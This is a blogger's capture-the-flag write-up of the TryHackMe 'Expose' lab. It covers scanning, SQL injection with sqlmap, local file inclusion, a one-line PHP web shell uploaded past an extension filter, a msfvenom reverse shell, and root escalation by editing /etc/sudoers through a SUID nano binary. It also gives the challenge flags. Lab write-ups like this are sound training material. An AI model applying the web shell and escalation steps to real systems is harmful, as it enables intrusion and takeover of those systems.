Skip to main content

THM - Expose

· 11 min read
Strider

Intro

Hi, after some time, I write again a small WriteUp. Today it's about the CTF "Expose". This CTF-Challenge can be found at the platform TryHackMe. You have to find 2 flags in this challenge. Here to simply create an account, and off you go 😄

Discovery

Ok lets go! The first thing what i've done is to run an nmap scan on the target ip address 10.10.180.99. After some time I got the results below which sounds interesting.

Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-10-01 16:40 CEST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 16:40
Completed NSE at 16:40, 0.00s elapsed
Initiating NSE at 16:40
Completed NSE at 16:40, 0.00s elapsed
Initiating NSE at 16:40
Completed NSE at 16:40, 0.00s elapsed
Initiating Ping Scan at 16:40
Scanning 10.10.180.99 [4 ports]
Completed Ping Scan at 16:40, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:40
Completed Parallel DNS resolution of 1 host. at 16:40, 0.04s elapsed
Initiating SYN Stealth Scan at 16:40
Scanning 10.10.180.99 [65535 ports]
Discovered open port 22/tcp on 10.10.180.99
Discovered open port 53/tcp on 10.10.180.99
Discovered open port 21/tcp on 10.10.180.99
Discovered open port 1337/tcp on 10.10.180.99
Discovered open port 1883/tcp on 10.10.180.99
Completed SYN Stealth Scan at 16:40, 17.52s elapsed (65535 total ports)
Initiating Service scan at 16:40
Scanning 5 services on 10.10.180.99
Completed Service scan at 16:40, 11.23s elapsed (5 services on 1 host)
Initiating OS detection (try #1) against 10.10.180.99
Retrying OS detection (try #2) against 10.10.180.99
Retrying OS detection (try #3) against 10.10.180.99
Retrying OS detection (try #4) against 10.10.180.99
Retrying OS detection (try #5) against 10.10.180.99
Initiating Traceroute at 16:40
Completed Traceroute at 16:40, 0.05s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 16:40
Completed Parallel DNS resolution of 2 hosts. at 16:40, 0.08s elapsed
NSE: Script scanning 10.10.180.99.
Initiating NSE at 16:40
NSE: [ftp-bounce] PORT response: 500 Illegal PORT command.
Completed NSE at 16:40, 8.68s elapsed
Initiating NSE at 16:40
Completed NSE at 16:40, 0.37s elapsed
Initiating NSE at 16:40
Completed NSE at 16:40, 0.01s elapsed
Nmap scan report for 10.10.180.99
Host is up (0.045s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.11.4.174
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ca:24:e4:a3:07:8b:bb:9f:e6:57:4f:5b:6e:30:d3:d2 (RSA)
| 256 1c:c5:28:08:0a:2c:5f:b2:55:8f:ba:9e:24:12:82:2f (ECDSA)
|_ 256 cd:e2:e2:92:ee:bf:59:03:fa:af:8a:f7:fb:f9:40:68 (ED25519)
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.16.1-Ubuntu
1337/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: EXPOSED
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
1883/tcp open mosquitto version 1.6.9
| mqtt-subscribe:
| Topics and their most recent payloads:
| $SYS/broker/load/publish/sent/1min: 28.32
| $SYS/broker/load/messages/received/15min: 0.20
| $SYS/broker/load/messages/received/5min: 0.58
| $SYS/broker/clients/active: 1
| $SYS/broker/bytes/received: 69
| $SYS/broker/load/bytes/received/1min: 60.29
| $SYS/broker/clients/maximum: 1
| $SYS/broker/messages/stored: 36
| $SYS/broker/clients/connected: 1
| $SYS/broker/subscriptions/count: 2
| $SYS/broker/clients/disconnected: 0
| $SYS/broker/load/connections/1min: 1.67
| $SYS/broker/load/sockets/5min: 0.38
| $SYS/broker/load/messages/sent/5min: 6.67
| $SYS/broker/load/publish/sent/5min: 6.09
| $SYS/broker/clients/inactive: 0
| $SYS/broker/publish/messages/sent: 31
| $SYS/broker/heap/maximum: 52384
| $SYS/broker/load/bytes/received/15min: 4.56
| $SYS/broker/load/sockets/1min: 1.55
| $SYS/broker/load/messages/received/1min: 2.59
| $SYS/broker/load/connections/15min: 0.13
| $SYS/broker/load/publish/sent/15min: 2.05
| $SYS/broker/bytes/sent: 1219
| $SYS/broker/uptime: 649 seconds
| $SYS/broker/load/connections/5min: 0.39
| $SYS/broker/heap/current: 51984
| $SYS/broker/load/sockets/15min: 0.13
| $SYS/broker/store/messages/count: 36
| $SYS/broker/store/messages/bytes: 156
| $SYS/broker/retained messages/count: 39
| $SYS/broker/publish/bytes/sent: 129
| $SYS/broker/load/bytes/sent/1min: 1113.17
| $SYS/broker/load/bytes/sent/15min: 80.77
| $SYS/broker/messages/sent: 34
| $SYS/broker/load/bytes/received/5min: 13.42
| $SYS/broker/version: mosquitto version 1.6.9
| $SYS/broker/load/bytes/sent/5min: 239.36
| $SYS/broker/messages/received: 3
| $SYS/broker/load/messages/sent/15min: 2.25
| $SYS/broker/load/messages/sent/1min: 30.91
|_ $SYS/broker/clients/total: 1
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=10/1%OT=21%CT=1%CU=38251%PV=Y%DS=2%DC=T%G=Y%TM=6519
OS:84F8%P=x86_64-pc-linux-gnu)SEQ(SP=FC%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)O
OS:PS(O1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O5=M508S
OS:T11NW7%O6=M508ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)E
OS:CN(R=Y%DF=Y%T=40%W=F507%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F
OS:=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5
OS:(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z
OS:%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=
OS:N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%
OS:CD=S)

Uptime guess: 36.921 days (since Fri Aug 25 18:34:07 2023)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=252 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8080/tcp)
HOP RTT ADDRESS
1 43.17 ms 10.11.0.1
2 44.47 ms 10.10.180.99

NSE: Script Post-scanning.
Initiating NSE at 16:40
Completed NSE at 16:40, 0.00s elapsed
Initiating NSE at 16:40
Completed NSE at 16:40, 0.00s elapsed
Initiating NSE at 16:40
Completed NSE at 16:40, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.26 seconds
Raw packets sent: 65809 (2.900MB) | Rcvd: 65733 (2.633MB)

Well, there are some interessting ports open! VSFTPd on port 21, which also allows anonymous login, defnitly that service which I want to checkout first. DNS (Bind9) on port 53/TCP which may allows Zonetransfers. An HTTP on port 1337 which I should open with my browser. The last service is mosquitto on port 1883, which is a message broker and mostly used for IoT. Intresting that we got several topics listed by nmap.

First of all I want to look at the files hosted on FTP. Nahh, we got nothing dia1.png

I tried to upload somethine and got also an error message "permission denied". Well, this services is at the current point useless, but maybe useful later.

Zonetransfers with...

dig axfr 10.10.180.99

also doesn't worked for me and other dns request too. Which says something to me I had to look at the HTTP service on port 1337.

Visiting port 1337 with my web browser shows me this page. dia2.png

At the same time I let run nikto to discover some additional information about the http server running on port 1337.

dia2.png

Well, we see that there is an admin directory

At the same time gobuster tells me there is also an phpmyadmin folder? Is that the way of the Challenge, that I have to brak into phpmyadmin somehow? Well first I want to find out what is behind the path /admin

dia4.png

Visisting the url "http://10.10.180.99:1337/admin/" show me this nice login

dia5.png

After some tries to get someting as error if I enter some dummy credentials, I got the thought about what if this login panel is fake? So I decided to look what I find under the path /phpmyadmin. Ok what i thought it phpmyadmin. For me it was the trigger to search for the version of phpmyadmin and their vulnerabilities. Maybe I find an suitable exploit for that. But nothing!

dia6.png

I decided to subscribe all topics on the MQTT-Service on port 1883, maybe I get more information.

dia7.png

Some minutes later I got suspicous, I overlook someting? I started again gobuster with an different wordlist to bruteforce the directories and may I get more. This time i used the default wordlists from dirb to enumerate the directories.

And yes, I got more directories which I can look for.

dia8.png

The first directory i want to checkout is admin_101, may there is the non-fake admin panel. before i do that, i set an /etc/hosts entry expose.thm to the ip address.

dia9.png

Well we see the email field is filled with the address "hacker@root.thm". Could that the real domain of the vm? I also added an entry to the /etc/hosts where root.thm points to that ip address. I will enumerate the DNS subdomains with wfuzz later.

Well I entered the character a as password for that user and I got an error. In the console of the developer tools I can see that there was an SQL query returned as response.

dia10.png

Ok, for me it's time to fire up sqlmap to test if there is an sql injection vulnerability. Few minutes later I got the response from sqlmap that the parameter email is vulnerable and i could dump the entire database.

dia11.png And it's done. The whole database expose was dumped dia12.png

Initial access

The user hacker@root.thm really exist in the table user and his password is in cleartext stored in the table.

The table config looks pretty interesting, because of the password hash and the files

The first file /file1010111/index.php sounds interesting, because may there is an hidden admin panel? The second file /upload-cv00101011/index.php, sounds for me like arbitray file uploads, but there more. The file can only used by an user which starts with the letter z

Well, I have to try the credentials on the admin panel.

dia13.png

Ok, a pretty nice startpage looks at me. This could be something like "ChatGPT". I analyzed the source code of this page but there was nothing. I think the that is not the right way and I have to look for the other two files listed in the table config. First file which i visited was /file1010111/index.php with the password from the config table. And got this page.

dia15.png

Well, the page says to me "Parameter fuzzing is also important :) or Can you hide DOM elements?". I looked at the source code of this page and got the hint there is an GET paramenter file or view.

dia16.png

I tried first the parameter file, may i've found a LFI? The first what I tried is to include the file /etc/passwd from the target machine. And yeah it look like an LFI. I saved the contents of this file and analyzed them which users I possibly find on that system.

There are 2 users which I may have for upgrading my shell if I got inital access.

dia17.png

The first user is ubuntu and the second is zeamkish which starts with the letter z

I visited the second file and entered the username as the password and viola, I'm in.

dia19.png

Ok, I have an file upload here. May there is a chance of arbitrary file uploads where I can upload a shell. I created a simple php shell with the following code:

<?php echo system($_GET['id']);?>

This shell, I've saved as shell.php.png to bypass the extension filter. With BurpSuite, I used the repeater to edit my request to upload the shell as an php file. And it worked!

dia20.png

The next thing I've done is to create an reverse shell with msfvenom to get a better shell for initial accessing the files on that system.

dia21.png

With the same method I uploaded the shell and got the command shell session in metasploit, nice.

dia22.png

First flag

After getting initial access, I decided to read the files from the admin panel to get the database credentials which I can use for phpmyadmin.

dia23.png

dia24.png

I don't know why but I also listed the home directories of those both users, and i found an file called ssh_creds.txt which everyone can ready, also me!

dia25.png

With this credentials I got an shell via ssh, which is definitly better that the reverse shell.

dia26.png

The first thing was for me to readout the file flag.txt.

User:THM{USER_FLAG_1231_EXPOSE}

Escalating privileges

The next logical step would be to escalate the privileges to get root. This first what I've done was to enumerate all SUID binaries.

Searched and found! Why is the editor nano listed ad SUID binary?

dia27.png

Ok, well done i would say, I tested the editor to readout the file /etc/shadow to list all user passwords on that system.

dia28.png

Now that I have potential root privileges, I have to maintain the priviliges to my current user zeamkish. I just edited the file /etc/sudoers to make this user to root.

Rootflag

dia29.png

Now I have to run sudo -i and I should be logged in as root.

dia30.png

I'm root and here the root flag

root:THM{ROOT_EXPOSED_1001}

That concludes the challenge.

This challenge was fun to do as I found it very refreshing. So for beginners this is definitely recommended 😄

I hope you enjoyed it and see you next time 😄